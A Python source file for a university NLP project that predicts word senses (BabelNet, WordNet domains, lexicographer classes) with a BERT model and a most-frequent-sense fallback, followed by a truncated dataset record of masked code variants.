    vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
    correctly_saved = 0
    # Derive the gold-key file name from the dataset file name:
    # '<name>.data.xml' -> '<name>.data.babelnet.gold.key.txt'.
    filename = os.path.normpath(input_path)
    filename = filename.split(os.sep)[-1]
    filename = filename[:-3]+"babelnet.gold.key.txt"
    for index in range(len(prediction_results)):
        # Output head [0] of the multitask model carries the Babelnet scores
        # (see the label-size list passed to WSD in __predict).
        correctly_saved += __write_result(filename,
                                          sentences_xml_elements[index],
                                          resources_path, output_path,
                                          prediction_results[index][0][0],
                                          vocab=vocab_label_bn,
                                          enable_coarse_grained=1,
                                          vocab_for_coarse=None)
    print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
    del prediction_results
    print("Of these, {} were MFS".format(mfs_counter))
    mfs_counter = 0
    return
def predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:
    """
    DO NOT MODIFY THE SIGNATURE!
    This is the skeleton of the prediction function.
    The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
    with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").

    The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.

    N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
    If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding

    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param output_path: the path of the output file (where you save your predictions)
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: None
    """
    global mfs_counter
    print(">>>> WORDNET DOMAINS PREDICTION")
    prediction_results, sentences_xml_elements = __predict(input_path,resources_path)
    vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    correctly_saved = 0
    # Babelnet id -> WordNet-domain mapping used as the coarse-grained fallback.
    bn2wndom = get_bn2wndomains()
    # Derive the gold-key file name: '<name>.data.xml' ->
    # '<name>.data.wndomains.gold.key.txt'.
    filename = os.path.normpath(input_path)
    filename = filename.split(os.sep)[-1]
    filename = filename[:-3]+"wndomains.gold.key.txt"
    for index in range(len(prediction_results)):
        # Output head [1] of the multitask model carries the WordNet-domains
        # scores (see the label-size list passed to WSD in __predict).
        correctly_saved += __write_result(filename,
                                          sentences_xml_elements[index],
                                          resources_path, output_path,
                                          prediction_results[index][1][0],
                                          vocab=vocab_label_wndmn,
                                          enable_coarse_grained=2,
                                          vocab_for_coarse=bn2wndom)
    print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
    del prediction_results
    print("Of these, {} were MFS".format(mfs_counter))
    # Reset the module-level MFS counter for the next prediction run.
    mfs_counter = 0
    return
def predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:
    """
    DO NOT MODIFY THE SIGNATURE!
    This is the skeleton of the prediction function.
    The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
    with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").

    The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.

    N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
    If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding

    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param output_path: the path of the output file (where you save your predictions)
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: None
    """
    global mfs_counter
    print(">>>> LEXICOGRAPHER PREDICTION")
    prediction_results, sentences_xml_elements = __predict(input_path, resources_path)
    vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
    correctly_saved = 0
    # Derive the gold-key file name: '<name>.data.xml' ->
    # '<name>.data.lexicon.gold.key.txt'.
    filename = os.path.normpath(input_path)
    filename = filename.split(os.sep)[-1]
    # Babelnet id -> lexicographer-id mapping used as the coarse-grained fallback.
    bn2lex = get_bn2lex()
    filename = filename[:-3] + "lexicon.gold.key.txt"
    for index in range(len(prediction_results)):
        # Output head [2] of the multitask model carries the lexicographer
        # scores (see the label-size list passed to WSD in __predict).
        correctly_saved += __write_result(filename,
                                          sentences_xml_elements[index],
                                          resources_path,output_path,
                                          prediction_results[index][2][0],
                                          vocab= vocab_label_lex,
                                          enable_coarse_grained=3,
                                          vocab_for_coarse=bn2lex)
    print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
    del prediction_results
    print("Of these, {} were MFS".format(mfs_counter))
    # Reset the module-level MFS counter for the next prediction run.
    mfs_counter = 0
    return
def __predict(input_path : str, resources_path : str) -> Tuple:
    """
    Builds the multitask WSD model, loads its weights and runs it over every
    sentence of the given dataset.

    :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :return: a tuple (list of per-sentence model outputs, the sentence XML
        elements extracted from the dataset tree)
    """
    train, etree_data = load_dataset(input_path)
    # Drop empty sentences before feeding the model.
    train = [dato for dato in train if dato]
    vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
    vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
    vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
    # One output head per task, sized [babelnet, wndomains, lexicographer] —
    # this ordering is what predict_* rely on when indexing the results.
    modello = WSD(resources_path+"/vocabularies/bert_vocab.txt", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)
    tokenizatore = modello.tokenizatore
    # NOTE(review): checkpoint file name is hard-coded — keep in sync with
    # the training script's save path.
    modello.model.load_weights(resources_path+"/saved_model/model_20_2.14.h5")
    to_return = []
    # Third-level elements of the XML tree (corpus/text/sentence layout assumed).
    sentences_xml_elements = etree_data.xpath("/*/*/*")
    for sentence in train:
        feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)
        results = modello.model.predict(
            {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},
            verbose=1
        )
        to_return.append(results)
    del vocab_label_lex
    del vocab_label_wndmn
    del vocab_label_bn
    return to_return, sentences_xml_elements
def __write_result(filename: str,
                   frase,
                   resources_path: str,
                   outputh_path: str,
                   predictions,
                   vocab = None,
                   enable_coarse_grained: int = 1,
                   vocab_for_coarse = None) -> int:
    """
    Write results in the file system
    :param filename: the name of the file to save
    :param frase: the object from which recover the sentence
    :param resources_path: the path of the resources folder containing your model and stuff you might need.
    :param outputh_path: the path of the output folder (where you save your predictions); note the historical typo in the parameter name
    :param predictions: the predictions made by the system
    :param vocab: the vocab needed for giving a sense
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :param vocab_for_coarse: The vocab in support of mode 2 or 3
    :return: 1 if succeeds
    """
    global mfs_counter
    bn2wn = get_bn2wn()
    lemma2wn = reload_word_mapping(resources_path+"/mapping/lemma2wn.txt")
    to_write = []
    for index, parola in enumerate(frase):
        name = parola.xpath('name()')
        # Only <instance> elements carry a sense to disambiguate; <wf> tokens
        # are skipped.
        if name == 'instance':
            # NOTE(review): 'id' shadows the builtin of the same name.
            id = parola.get('id')
            list_of_possible_senses_first_step = lemma2wn.get(parola.text)
            if not list_of_possible_senses_first_step:
                # No candidate senses for this surface form: fall back to MFS.
                the_actual_meaning = MFS(parola,
                                         bn2wn,
                                         vocab2=vocab_for_coarse,
                                         pred_case=enable_coarse_grained)
                mfs_counter += 1
                to_write.append((id, the_actual_meaning))
                continue
            list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)
            # create_custom_label returns the model scores for each candidate
            # plus the candidates that survived the vocabulary lookup.
            candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,
                                                                               parola.text,
                                                                               vocab,
                                                                               predictions[index],
                                                                               enable_coarse_grained=enable_coarse_grained)
            the_actual_meaning = None
            if candidates:
                # Pick the candidate sense the model scored highest.
                argmax = np.argmax(candidates)
                the_actual_meaning = list_of_possible_senses_bn_version[argmax]
            else:
                # No candidate survived the lookup: fall back to MFS.
                mfs_counter += 1
                the_actual_meaning = MFS(parola,
                                         bn2wn,
                                         vocab2=vocab_for_coarse,
                                         pred_case=enable_coarse_grained)
            to_write.append((id, the_actual_meaning))
    # NOTE(review): append mode — re-running a prediction adds duplicate
    # lines to an existing gold-key file instead of replacing it.
    with open(outputh_path + "/"+filename, "a") as test_saving:
        for tupla in to_write:
            test_saving.write(tupla[0] + " " + tupla[1]+"\n")
    del to_write
    del lemma2wn
    del bn2wn
    return 1
def MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:
    """
    Returns the sense by applying the Most Frequent Sense (MFS) strategy
    :param parola: the Element object to which associate a sense
    :param vocab: the vocab needed for giving a sense
    :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
    :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
    1 --> Means I'm predicting with Babelnet. No extra precautions needed
    2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
    3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
    :return: the chosen sense with the MFS technique
    """
    pos = parola.get('pos')
    pos_input = __decide_pos(pos)
    # All WordNet synsets for the lemma, restricted to the mapped POS; the
    # first entry is WordNet's most frequent sense.
    wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
    try:
        wordnet_object = wordnet_object[0]
    except:
        # NOTE(review): on an empty synset list this only prints diagnostics;
        # execution falls through and the .offset() call below raises
        # AttributeError on the (still empty) list.
        print(wordnet_object)
        print(parola.text)
    # Canonical WordNet id, e.g. 'wn:00001740n' (zero-padded offset + POS letter).
    wn_synset = "wn:" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()
    # Reverse lookup: the Babelnet id whose mapped WN ids contain wn_synset.
    # NOTE(review): next() without a default raises StopIteration on a miss.
    the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)
    to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)
    return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str:
    """
    Turn a raw MFS lookup result (a string or a list) into the final
    prediction string for the requested task.

    :param value: the Babelnet id(s) found by the MFS lookup
    :param pred_case: prediction mode:
        1 --> Babelnet: the id is returned untouched
        2 --> WordNet Domains: looked up in vocab, 'factotum' on a miss
        3 --> Lexicographer: looked up in vocab
    :param vocab: the coarse-grained mapping consulted for modes 2 and 3
    :return: the meaning to write out
    """
    meaning = __type_checker(value)
    if pred_case == 1:
        return meaning
    if pred_case == 2:
        hit = vocab.get(meaning)
        return hit[0] if hit else "factotum"
    if pred_case == 3:
        return vocab.get(meaning)[0]
def __type_checker(value: object) -> str:
    """
    Normalise *value* to a plain string: a str passes through unchanged, a
    list yields its first element, anything else yields None.

    :param value: the object to normalise
    :return: the extracted string (or None for unsupported types)
    """
    kind = type(value)
    if kind == str:
        return value
    return value[0] if kind == list else None
def __decide_pos(pos: str) -> str:
    """
    Map a coarse POS tag to its single-letter WordNet code.

    :param pos: the coarse tag ('NOUN', 'VERB', 'ADJ' or 'ADV')
    :return: 'n', 'v', 'a' or 'r' respectively; None for any other tag
    """
    wn_codes = {"NOUN": "n", "VERB": "v", "ADJ": "a", "ADV": "r"}
    return wn_codes.get(pos)
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:
    """
    Cast the given list (which contains only WN ids) to Babelnet IDs.

    :param list_of_bn: the list of WordNet ids to cast
    :param vocab: mapping Babelnet id -> WordNet id(s) used for the conversion
    :return: the converted list; ids with no match in vocab are skipped
    """
    list_of_possible_senses_bn_version = []
    for candidate in list_of_bn:
        # Bugfix: next() now has a None default. The original had no default,
        # so an unmatched candidate raised StopIteration instead of reaching
        # the falsy check below that was clearly meant to skip it.
        is_it_here = next((key for key, value in vocab.items() if candidate in value), None)
        if is_it_here:
            list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])
    return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:
    """
    Converts the list of babelnet IDs to prediction scores and outputs both
    the scores and the senses that survived the conversion.

    :param list_of_possible_senses: the list that contains all the babelnet's IDs
    :param word: the word for which we are predicting the sense in a specific moment
    :param vocab: the vocabulary Word -> Serial to exploit for the conversion
    :param predictions: the predictions made by the system
    :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Possible values:
    1 --> vocab is keyed on '<word>_<sense>'
    2,3 --> vocab is keyed on the sense alone (coarse-grained)
    :return: a tuple (scores, kept senses), index-aligned with each other
    """
    scores = []
    kept_senses = []
    for sense in list_of_possible_senses:
        # Fine-grained vocab keys are '<word>_<babelnet id>'; coarse-grained
        # keys are the bare sense id.
        key = word + "_" + sense if enable_coarse_grained == 1 else sense
        try:
            serial = int(vocab[key])
            scores.append(predictions[serial])
        except (KeyError, ValueError, TypeError, IndexError):
            # Bugfix: narrowed from a bare 'except:' which also swallowed
            # KeyboardInterrupt/SystemExit. Unknown or malformed keys are
            # simply dropped, as before.
            continue
        kept_senses.append(sense)
    return scores, kept_senses
if __name__ == "__main__":
    # NOTE(review): hard-coded absolute paths from the author's machine —
    # replace with CLI arguments before running elsewhere.
    predict_babelnet("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
    #predict_wordnet_domains("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
    #predict_lexicographer("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
|
flexible
|
{
"blob_id": "e3631a2a003f98fbf05c45a019250e76d3366949",
"index": 2582,
"step-1": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: 
str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: 
str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\n<mask token>\n\n\ndef __write_result(filename: str, frase, resources_path: str, 
outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = 
np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: 
str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: 
str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually 
predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = 